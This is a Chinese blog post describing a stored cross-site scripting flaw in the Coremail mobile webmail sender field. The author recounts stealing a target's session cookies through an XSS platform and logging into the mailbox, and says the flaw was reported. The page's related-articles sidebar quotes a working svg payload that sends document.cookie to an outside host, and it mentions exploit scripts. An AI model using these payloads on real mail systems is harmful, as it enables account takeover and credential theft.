Coremail手机版页面持久型XSS实践

最新推荐文章于 2023-08-22 16:37:02 发布
最新推荐文章于 2023-08-22 16:37:02 发布
阅读量2.7k 收藏
点赞数
分类专栏: 渗透测试 文章标签: coremail 漏洞 邮箱
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/51292174
版权

0x00 前言

学校的邮箱是号称7亿用户都在用的Coremail邮箱系统.
利用这个漏洞,我们可以在一些条件下直接进入邮箱.

这个持久型XSS是王欢学长在上个暑假发现的,欢哥喜欢从小鸭子们身上收获编程的灵感,偷偷的告诉大家他的微信号:qqwanghuan

0x01 描述

当我们使用手机访问mail.bjtu.edu.cn登录时,会跳转到手机版的登录界面.

0x02 详情

这个XSS发生的位置就是"发件人"的位置,没有过滤.

我们构造一段有攻击性的代码:

]));123”’ /span><=\u003c\u003e;\u003c\u003e=>cdxy

打开我的阿里云邮,把这段代码写到我的"发件人"字段里.像下面这样:

保存之后,向我的校邮箱发送一封邮件,内容不需要写:

当用户使用手机登录校邮箱时,网页会加载我们之前填写的"联系人"字段,并把这部分代码当作javascript代码执行,代码成功让浏览器弹窗,打出了用户的cookies(用户的登录凭证,有了这个就可以直接进入你登录后的邮箱)

这里写图片描述

0x03 证明

如果要利用这个漏洞拿下邮箱的话,单弹一个窗是不行的.
修改了"发送人"字段的代码,连接XSS平台,向目标再次发送了一封邮件.

目标使用手机打开邮件时,看到邮件几乎没有任何异样.
其实代码已经运行了,我的平台已经收到了它的登录凭证.

这里写图片描述

接受到的信息如下.

利用这些信息就能直接进入其邮箱,结果如下图:

注:该漏洞已提交相关平台处理.作者不对任何形式的漏洞利用提供技术支持和答复.

Xyntax
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Coremail邮件系统存在配置信息泄露漏洞(CNVD-2019-16798)
墨痕诉清风的博客
11-09 7439
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5本,补丁编号为CMXT5-2019-0002,程序本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统的mailsms模块的参数大小敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 3834
1.安全公告2019年6月14,Coremail发布了3个高危漏洞的安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和存在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露的漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露的漏洞、反射XSS、路径遍历、...
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 2023
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 本中,邮件处理功能存在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发送该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
mail敏感配置信息泄露
众生度尽,方证菩提
07-28 1215
生活是美好的,生命在其间又是如此短促。既然活着,就应该好好地活。应该更珍惜自己生命的每个时刻,精神上的消沉无异于自杀。像往日一样正常的投入生活吧,即便是痛苦,也应该被看做是人的正常情感,甚至它是组成我们幸福生活的一个不可缺欠的部分。
Coremail远程代码执行
xxx9686的博客
09-18 734
Coremail的nginx配置文件中针对/lunkr/cache路径做upstream的时候未做X-Forwarded-For字段的设置,从而可以利用该接口实现配合利用nginx不解析;但是tomcat解析;的差异特性实现绕过tomcat的manager应用127.0.0.1本地ip限制。并且coremail默认的tomcat-user为coremail,coremail。访问过去会直接跳转到tomcat控制台,这里你就可以采用coremail/coremail弱口令尝试登陆,或者暴力破解。
Coremail邮件系统 2.11.3
10-04
Coremail闪电邮客户端软件是一款优秀的国产电子邮件客户端,是为企业用户打造的企业级邮件客户端软件。提供独创的Coremail私有邮件协议,同时支持POP3、IMAP邮箱协议;可同时管理多个
Coremail-Plugin(4.2.4.15).zip
07-10
Coremail官网已无法下载本插件,产品诞生于1999年,经过十多年发展,如今从亿万级别的运营系统,到几万人的大企业,都有了Coremail的客户。截止2010年,Coremail邮件系统产品在国内已拥有超过3亿终端用户,是目前...
华为云鲲鹏架构实践分享:Coremail邮件新起点.pdf
09-23
华为云鲲鹏架构实践分享:Coremail邮件新起点.pdf
CoreMail监管账号配置.docx
12-01
配置coremail监管账号,用于做邮件的归档审计检查用。
Coremail-PC(4.0.0.862)_20200507.exe
12-06
Coremail-PC
MailCore-master11
01-09
maikcore用于邮件的开发,稍作修改就能实现pop3、imap和smtp
Getshell总结
weixin_45694388的博客
10-08 1928
按方式分类: 0x01注入getshell: 0x02 上传 getwebshell 0x03 RCE getshell 0x04 包含getwebshell 0x05 漏洞组合拳getshell 0x06 系统层getcmdshell 0x07 钓鱼 getcmdshell 0x08 cms后台getshell 0x09 红队shell竞争分析 0x01注入getshell: 一般前提条件:有权限、知道路径 MySQL select 0x3c3f70687020a6576616c28245f504f53.
Coremail邮件系统存储XSS两个
weixin_34008933的博客
10-21 341
(1):Coremail邮件系统存储XSS之一 给受害者发送主题如下的邮件: <svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'> 当受害者试图打开邮件时,cookie将会被窃取: (2):Coremail邮件系统存储XSS之二 将特制的swf文件作为附件...
红方人员实战手册
渗透测试研究中心
04-23 1035
日常流程简要说明入口权限 => 内网搜集/探测 => 免杀提权[非必须] => 抓取登录凭证 => 跨平台横向 => 入口维持 => 数据回传 => 定期权限维护 0x01 入口权限获取 [ 前期侦察,搜集阶段本身就不存在太多可防御的点,非防御重心 ]1.绕CDN找出目标所有真实ip段(1).通过全国多个PING,查看IP地址是否唯一来判断是否存在CDN...
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
热门推荐
god_Zeo的安全博客
06-17 1万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
APP端常见漏洞与实例分析
IT教育任姐姐的博客
03-03 2430
前言:白帽子们一般都是从web端开始学习安全技术,但是我们并不满足于web端,自然而然地对APP端产生了浓厚的兴趣,本文将讲述如何在移动端进行渗透,并分享自己在对移动端渗透过程中常见的漏洞与一些案例的分析。 01环境搭建 首先下载一个模拟器来模拟手机的环境,本文使用的是夜神模拟器。 1、在burpsuite中新建一个代理,注意端口不要冲突 2、在模拟器中打开设置界面中的WLAN菜单,长按弹出,点击修改网络 3、点击手动,然后配置电脑的ip,和代理端口,保存退出。 4、打开浏览器,访.
无胁科技-TVD每日漏洞情报-2022-7-27
wuthreat无胁科技的博客
07-28 797
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CVE-2022-34966。漏洞编号CVE-2022-34907。...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 1916
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马入数据库
关于coremail的0day
谁的博客
06-14 3460
#-- Coding: utf-8 -- #Author: Vulkey_Chen #Email: [email protected] #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?...
Coremail 单点登录
最新发布
04-04
Coremail是一种企业级邮件系统,它提供了单点登录(Single Sign-On,简称SSO)功能,可以实现用户在不同的应用系统中只需登录一次,即可访问其他相关系统而无需再次输入用户名和密码。 Coremail单点登录的实现方式主要有以下几种: 1. 基于Cookie的SSO:用户在登录Coremail系统后,Coremail会生成一个包含用户身份信息的Cookie,并将其存储在用户的浏览器中。当用户访问其他相关系统时,这些系统会检查浏览器中的Cookie,从而实现自动登录。 2. 基于Token的SSO:用户在登录Coremail系统后,Coremail会生成一个唯一的令牌(Token),并将其返回给用户。当用户访问其他相关系统时,这些系统会通过验证该令牌的有效性来实现自动登录。 3. 基于统一身份认证(Unified Identity Authentication)的SSO:Coremail可以与企业的统一身份认证系统进行集成,通过该认证系统来实现单点登录。用户在登录Coremail系统后,Coremail会将用户的身份信息发送给认证系统进行验证,并获取认证结果来实现自动登录。 以上是Coremail单点登录的简要介绍,如果您对具体实现细节或其他相关问题有进一步的了解需求,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值